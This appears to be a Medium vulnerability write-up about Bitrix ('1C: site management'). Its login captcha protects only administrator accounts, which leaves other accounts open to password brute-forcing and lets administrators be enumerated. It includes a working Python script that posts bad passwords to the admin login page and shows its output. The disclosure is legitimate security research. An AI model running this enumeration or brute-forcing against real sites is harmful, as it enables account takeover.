User enumeration & Improper Restriction of Excessive Authentication Attempts in Bitrix

Vulnerability description:

There is an improper restriction of excessive authentication attempts in the latest version of the application “1C: site management”. It allows to brute passwords for accounts not in the “administrator” group. Moreover it allows to enumerate users who are in the “administrator” group.

Step-by-step:

There are 3 users in the system: admin, stag, root. User admin is the default user and he is in the “administrator” group. User stag has the same privileges as admin. User root is in all groups except the “administrator” group.

Image for post
Image for post
List of users
Image for post
Image for post
stag’s groups
Image for post
Image for post
root’s groups

If you send multiple times incorrect credentials for users admin and stag, the server will request you to fill the captcha. However, for user root will not request the captcha, which allows to bruteforce password. The response with length 753 means that server did not request the captcha. Response with length 802 means that server requested the captcha.

Image for post
Image for post
Attempts to brute the password for admin
Image for post
Image for post
Attempts to brute the password for stag
Image for post
Image for post
Attempts to brute the password for root
Image for post
Image for post
Successful password matching

Due to the fact that, the captcha is not required if user does not exist or isn’t in the “administrator” group we can enumerate all users in the “administrator” group. There is python script for admin enumeration:

import requests

f = open(“users.txt”,”r”)
for line in f:
for i in range(1, 5):
r = requests.post(‘http://192.168.0.188/bitrix/admin/index.php?login=yes', data = {‘AUTH_FORM’:’Y’,’TYPE’:’AUTH’,’USER_LOGIN’:line.strip(‘\n’), ‘USER_PASSWORD’:’not_valid_pass’,’Login’:’’,’captcha_sid’:’’,’captcha_word’:’’,’sessid’:’’})
if str(r.content).find(‘CAPTCHA_CODE’) > 0:
print(“Admin found: “ + str(line))
f.close()

Content of file user.txt:

root
admin
stag
fakeuser

Output:

Admin found: admin

Admin found: stag

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store